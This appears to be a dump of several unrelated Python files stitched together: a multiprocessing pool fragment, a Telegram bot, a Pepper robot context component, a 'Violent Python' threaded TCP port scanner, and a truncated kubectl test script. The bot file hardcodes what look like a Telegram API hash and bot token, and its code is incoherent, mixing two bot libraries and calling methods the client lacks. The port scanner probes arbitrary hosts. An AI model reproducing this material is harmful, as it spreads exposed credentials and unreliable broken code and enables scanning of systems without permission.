if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads and self._timeout_handler is not None:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the functions return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<%s: {id} ack:{ack} ready:{ready}>'.format(
self.__class__.__name__,
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from .dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
bot.py
|
import sys, io
import traceback
from amanobot.loop import MessageLoop
from contextlib import redirect_stdout
from colorama import Fore
import config
import time
import threading
from amanobot.exception import TooManyRequestsError, NotEnoughRightsError
from urllib3.exceptions import ReadTimeoutError
import db_handler as db
from telegram_upload.exceptions import catch
from telegram_upload.management import manage
import asyncio
import difflib
import html
import logging
import os
import re
import sys
import time
import urllib.parse
import click
import subprocess
from datetime import datetime
from telethon.tl.types import DocumentAttributeVideo
from telethon.errors import MessageNotModifiedError
from telethon import TelegramClient, events, types, custom, utils
from telethon.extensions import markdown
bot = TelegramClient("telegram-upload", "256406", "31fd969547209e7c7e23ef97b7a53c37")
logging.basicConfig(level=logging.WARNING)
logging.getLogger('asyncio').setLevel(logging.ERROR)
bot = config.bot
ep = []
n_ep = []
for num, i in enumerate(config.enabled_plugins):
try:
print(Fore.RESET + 'Loading plugins... [{}/{}]'.format(num+1, len(config.enabled_plugins)), end='\r')
exec('from plugins.{0} import {0}'.format(i))
ep.append(i)
except Exception as erro:
n_ep.append(i)
print('\n'+Fore.RED+'Error loading the plugin {}:{}'.format(i, Fore.RESET), erro)
def handle_thread(*args):
t = threading.Thread(target=handle, args=args)
t.start()
def handle(msg):
try:
for plugin in ep:
p = globals()[plugin](msg)
if p:
break
except (TooManyRequestsError, NotEnoughRightsError, ReadTimeoutError):
pass
except Exception as e:
with io.StringIO() as buf, redirect_stdout(buf):
traceback.print_exc(file=sys.stdout)
res = buf.getvalue()
bot.sendMessage(config.logs, '''There was an error in the plugin {}:
{}'''.format(plugin, res))
print('\n\nBot started! {}\n'.format(config.version))
MessageLoop(bot, handle_thread).run_as_thread()
bot.start(bot_token="671045549:AAH72sek9a9jPWHbBp8vRrWL_u68J9pRXYU")
bot.run_until_disconnected()
wr = db.get_restarted()
if wr:
try:
bot.editMessageText(wr, 'Restart successfully')
except:
pass
db.del_restarted()
else:
bot.sendMessage(config.logs, '''Bot Details
Verion: {}
Plugins Loaded: {}
An error occured in {} plugin(s){}'''.format(config.version, len(ep), len(n_ep), ': '+(', '.join(n_ep)) if n_ep else ''))
while True:
time.sleep(10)
|
context.py
|
from . import SpeechRecognitionComponent, ObjectDetectionComponent, FaceRecognitionComponent, TextToSpeechComponent
from ..sensor import Context, UtteranceHypothesis
from ..abstract import AbstractComponent, Led
from pepper.language import Utterance
from pepper import config
from collections import deque
from threading import Thread, Lock
from time import time
from typing import Deque
import numpy as np
class ContextComponent(AbstractComponent):
# Minimum Distance of Person to Enter/Exit Conversation
PERSON_AREA_ENTER = 0.25
PERSON_AREA_EXIT = 0.2
# Minimum Distance Difference of Person to Enter/Exit Conversation
PERSON_DIFF_ENTER = 1.5
PERSON_DIFF_EXIT = 1.4
CONVERSATION_TIMEOUT = 5
PEOPLE_LEDS = [Led.LeftFaceLed1, Led.RightFaceLed1,
Led.LeftFaceLed2, Led.RightFaceLed2,
Led.LeftFaceLed3, Led.RightFaceLed3,
Led.LeftFaceLed4, Led.RightFaceLed4,
Led.LeftFaceLed5, Led.RightFaceLed5,
Led.LeftFaceLed6, Led.RightFaceLed6,
Led.LeftFaceLed7, Led.RightFaceLed7,
Led.LeftFaceLed8, Led.RightFaceLed8]
def __init__(self, backend):
super(ContextComponent, self).__init__(backend)
speech_comp = self.require(ContextComponent, SpeechRecognitionComponent) # type: SpeechRecognitionComponent
object_comp = self.require(ContextComponent, ObjectDetectionComponent) # type: ObjectDetectionComponent
face_comp = self.require(ContextComponent, FaceRecognitionComponent) # type: FaceRecognitionComponent
self.require(ContextComponent, TextToSpeechComponent) # type: TextToSpeechComponent
self._conversation_time = time()
context_lock = Lock()
self._context = Context()
self._face_vectors = deque(maxlen=50)
self._people_info = []
self._face_info = []
def on_transcript(hypotheses, audio):
"""
Add Transcript to Chat (if a current Chat exists)
Parameters
----------
hypotheses: List[UtteranceHypothesis]
audio: np.ndarray
"""
with context_lock:
if self.context.chatting and hypotheses:
# Add ASR Transcript to Chat as Utterance
utterance = self.context.chat.add_utterance(hypotheses, False)
# Call On Chat Turn Event
self.on_chat_turn(utterance)
def get_closest_people(people):
person_area_threshold = (self.PERSON_AREA_EXIT if self.context.chatting else self.PERSON_AREA_ENTER)
person_diff_threshold = (self.PERSON_DIFF_EXIT if self.context.chatting else self.PERSON_DIFF_ENTER)
people_in_range = [person for person in people if person.bounds.area >= person_area_threshold]
# If only one person is in range
if len(people_in_range) == 1:
# Return that person
return [people_in_range[0]]
# If multiple people are in range
elif len(people_in_range) >= 2:
# Sort them by proximity
people_sorted = np.argsort([person.bounds.area for person in people_in_range])[::-1]
# Identify the two closest individuals
closest = people_in_range[people_sorted[0]]
next_closest = people_in_range[people_sorted[1]]
# If the closest individual is significantly closer than the next one
if closest.bounds.area >= person_diff_threshold * next_closest.bounds.area:
# Return Closest Individual
return [closest]
# If people are the same distance apart
else:
# Return all People
return people_in_range
else:
return []
def get_face(person, faces):
for face in faces:
if face.bounds.is_subset_of(person.bounds):
return face
def on_image(image, orientation):
# Get People within Conversation Bounds
closest_people = get_closest_people(self._people_info)
# if closest_people:
# self.backend.led.set(self.PEOPLE_LEDS[:len(closest_people)*2], (0, 1, 0), 0)
# else:
# self.backend.led.set([Led.RightFaceLeds, Led.LeftFaceLeds], (0, 0, 0), 0)
if not self.context.chatting:
# If one person is closest and his/her face is identifiable -> Start Personal Conversation
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# If multiple people are in range, with nobody seemingly closest -> Start Group Conversation
elif len(closest_people) >= 2:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(config.HUMAN_CROWD,)).start()
self._face_vectors.clear()
elif self.context.chatting:
# When talking to a human crowd
if self.context.chat.speaker == config.HUMAN_CROWD:
# If still in conversation with Group, update conversation time
if len(closest_people) >= 2:
self._conversation_time = time()
# Else, when conversation times out
elif time() - self._conversation_time >= self.CONVERSATION_TIMEOUT:
# If a single Person enters conversation at this point -> Start conversation with them
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# Otherwise, Exit Chat
else:
self.on_chat_exit()
self._face_vectors.clear()
else: # When talking to a Specific Person
# If still in conversation with Person, update conversation time
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
# If Still Chatting with Same Person -> Update Conversation Time & Face Vectors
if closest_face.name == self.context.chat.speaker:
self._conversation_time = time()
self._face_vectors.append(closest_face.representation)
# If Chatting to Unknown Person and Known Person Appears -> Switch Chat
elif self.context.chat.speaker == config.HUMAN_UNKNOWN and closest_face.name != config.HUMAN_UNKNOWN:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# Else, when conversation times out
elif time() - self._conversation_time >= self.CONVERSATION_TIMEOUT:
# If another Person enters conversation at this point -> Start Conversation with them
if len(closest_people) == 1:
closest_person = closest_people[0]
closest_face = get_face(closest_person, self._face_info)
if closest_face:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(closest_face.name,)).start()
self._face_vectors.clear()
# If Group enters conversation at this point -> Start Conversation with them
if len(closest_people) >= 2:
self._conversation_time = time()
Thread(target=self.on_chat_enter, args=(config.HUMAN_CROWD,)).start()
self._face_vectors.clear()
else:
self.on_chat_exit()
self._face_vectors.clear()
# Wipe face and people info after use
self._face_info = []
self._people_info = []
def on_object(image, objects):
self._people_info = [obj for obj in objects if obj.name == "person"]
self.context.add_objects(objects)
def on_face(people):
self._face_info = people
self.context.add_people(people)
# Link Transcript, Object and Face Events to Context
speech_comp.on_transcript_callbacks.append(on_transcript)
object_comp.on_object_callbacks.append(on_object)
face_comp.on_face_callbacks.append(on_face)
# Add On Image Callback
self.backend.camera.callbacks.append(on_image)
@property
def context(self):
# type: () -> Context
"""
Returns
-------
context: Context
Current Context
"""
return self._context
@property
def face_vectors(self):
# type: () -> Deque[np.ndarray]
return self._face_vectors
def say(self, text, animation=None, block=False):
# Call super (TextToSpeechComponent)
super(ContextComponent, self).say(text, animation, block)
# Add Utterance to Chat
if self.context.chatting:
self.context.chat.add_utterance([UtteranceHypothesis(text, 1)], me=True)
def on_chat_turn(self, utterance):
# type: (Utterance) -> None
"""
On Chat Turn Callback, called every time the speaker utters some Utterance
Parameters
----------
utterance: Utterance
Utterance speaker uttered
"""
pass
def on_chat_enter(self, person):
pass
def on_chat_exit(self):
pass
|
portscanner.py
|
#-*- coding:utf-8 -*- x
import optparse
from socket import *
from threading import *
screenLock = Semaphore(value=1)
def connScan(tgtHost,tgtPort):
try:
connSkt = socket(AF_INET,SOCK_STREAM)
connSkt.connect((tgtHost,tgtPort))
connSkt.send('ViolentPython\r\n')
results = connSkt.recv(100)
print '[+]%d/tcp open'% tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-]%d/tcp closed'% tgtPort
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost,tgtPorts):
try:
tgtIp=gethostbyname(tgtHost)
except:
print "[-] Cannot resolve \'%s\': Unkonwn host" % tgtHost
return
try:
tgtName= gethostbyaddr(tgtIp)
print '\n[+] Scan Results for: ' + tgtName[0]
except:
print '\n[+] Scan Results for: ' + tgtIp
setdefaulttimeout(1)
for tgtPort in tgtPorts:
t = Thread(target=connScan,args=(tgtHost,int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser("usage%prog " + "-H <target host> -p <target port>")
parser.add_option('-H',dest = 'tgtHost',type='string', help='specify target host')
parser.add_option('-p',dest = 'tgtPort',type='string', help='specify target port[s] separated by comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) and (tgtPorts[0] == None):
print '[-] You must specify a target host and port[s].'
exit(0)
portScan(tgtHost,tgtPorts)
if __name__ == '__main__':
main()
|
tests.py
|
###############################################################################
# Imports
import sys # Exit function
import os # OS functions
import argparse # Argument parser
import pprint # Pretty printing dicts
# Shell commands
import subprocess
from subprocess import Popen,PIPE
import shlex # Shell command parsing
from multiprocessing import Process, Lock # Parallel execution
from ast import literal_eval # String to dictionary
import re # Regular expressions
from scapy.all import * # Packet capture parsing
###############################################################################
# General utility and variables
contexts = ["owner", "vfx", "color", "sound", "hdr"] # workflow contexts
services = ["owner", "vfx1", "vfx2", "vfx3", "color", "sound", "hdr"] # workflow services
request_types = ["GET", "POST"] # possible requests available
interfaces = ["lo", "eth0"] # possible interfaces to capture on
# Exit the program
def terminate_app(code):
print("Exiting program...")
sys.exit(code)
# Returns pods available in a given context
def get_pods(context):
get_pods = shlex.split("kubectl --context {} get pods -o wide".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_pods))))
get_pods_p = Popen(get_pods,
stdout=subprocess.PIPE,
universal_newlines=True)
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=get_pods_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_pods_p.stdout.close()
stdout = tr_p.communicate()
if args.verbose >= 2:
print(stdout)
stdout_pods = stdout[0].split('\n')[1:-1]
pods = []
for line in stdout_pods:
if args.verbose >= 2:
print("Line: {}".format(line))
pod_id = line.split()[0]
pod_name = pod_id.split('-v1')[0]
pods.append(pod_name)
if args.verbose >= 2:
print(pods)
return pods
# Returns a pod from a list of pods and a name
def get_pod(pods, name):
return_pod = Pod()
for pod in pods:
if pod.name == name:
return_pod = pod
break
assert(return_pod.name != ""), "Pod " + name + " does not exist."
return return_pod
###############################################################################
# Argument parser
def get_parser():
# Get parser for command line arguments
parser = argparse.ArgumentParser(description="Tests for secure architecture")
parser.add_argument("--version", action="version", version='%(prog)s 1.0')
parser.add_argument("-v", "--verbose", action="count", default=0, help="increase output verbosity")
parser.add_argument("-n", "--no-capture", action="store_true", help="do not capture")
parser.add_argument("-p", "--policy-file", type=str, metavar="FILE", default="../service-mesh/policy.yaml", help="policy file for capture checking")
parser.add_argument("-d", "--capture-dir", type=str, metavar="DIR", default="packet_captures/", help="packet capture folder")
parser.add_argument("-o", "--override-pods", type=str, metavar="NAME:IP...", default="", help="override pod IP addresses")
return parser
###############################################################################
# Pod object
class Pod:
def __init__(self, name=None, context=None):
# Dummy pod for error handling
if name is None:
self.name = ""
self.context = ""
self.pod_id = ""
self.pod_ip = ""
self.service_ip = ""
self.service_port = ""
else:
self.name = name
self.context = context
assert(self.context != None), "Pod " + name + " has no context."
self.pod_id = self.get_pod_id(name, context)
assert(self.pod_id != ""), "Pod " + name + " does not exist."
self.pod_ip = self.get_pod_ip(name, context)
assert(self.pod_ip != ""), "Pod " + name + " has no IP."
self.service_ip = self.get_service_ip(name, context)
assert(self.service_ip != ""), "Pod " + name + " has no service IP."
self.service_port = self.get_service_port(name, context)
assert(self.service_port != ""), "Pod " + name + " has no service port."
def __repr__(self):
return "Pod({}, {}, {}, {}, {}, {})".format(self.name, self.context, self.pod_id, self.pod_ip, self.service_ip, self.service_port)
# Returns the pod ID
def get_pod_id(self, name, context):
get_pods = shlex.split("kubectl --context {} get pods".format(context))
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, get_pods))))
get_pods_p = Popen(get_pods,
stdout=subprocess.PIPE,
universal_newlines=True)
grep = shlex.split("grep " + name)
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, grep))))
grep_p = Popen(grep,
stdin=get_pods_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
get_pods_p.stdout.close()
tr = shlex.split("tr -s ' '")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, tr))))
tr_p = Popen(tr,
stdin=grep_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
grep_p.stdout.close()
cut = shlex.split("cut -d ' ' -f 1")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, cut))))
cut_p = Popen(cut,
stdin=tr_p.stdout,
stdout=subprocess.PIPE,
universal_newlines=True)
tr_p.stdout.close()
awk = shlex.split("awk 'NR>1{print PREV} {PREV=$0} END{printf(\"%s\",$0)}'")
if args.verbose >= 3:
print("Command: [{}]".format(", ".join(map(str, awk))))
awk_p = Popen(awk,
